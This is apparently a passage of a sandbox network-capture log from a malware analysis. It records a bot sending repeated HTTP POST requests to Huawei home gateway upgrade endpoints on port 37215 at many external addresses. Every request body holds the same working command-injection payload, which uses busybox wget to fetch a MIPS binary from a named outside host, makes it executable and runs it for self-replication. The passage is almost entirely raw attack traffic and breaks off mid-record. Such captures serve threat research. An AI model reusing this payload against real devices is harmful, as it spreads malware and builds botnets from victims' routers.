                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          846192.168.2.2359968197.109.109.14837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.243236065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          847192.168.2.2360732197.30.154.24237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.243311882 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          848192.168.2.2348076157.48.100.8837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.243618011 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          849192.168.2.2349966197.219.212.25037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.243633032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          850192.168.2.2357382157.2.127.4937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.243653059 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          851192.168.2.2349346197.11.37.14137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.243921995 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          852192.168.2.235961441.232.213.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.243937969 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          853192.168.2.2346952157.175.179.13837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.244518995 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          854192.168.2.2341642169.248.222.16937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.244785070 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          855192.168.2.2352350197.44.132.16737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.244816065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
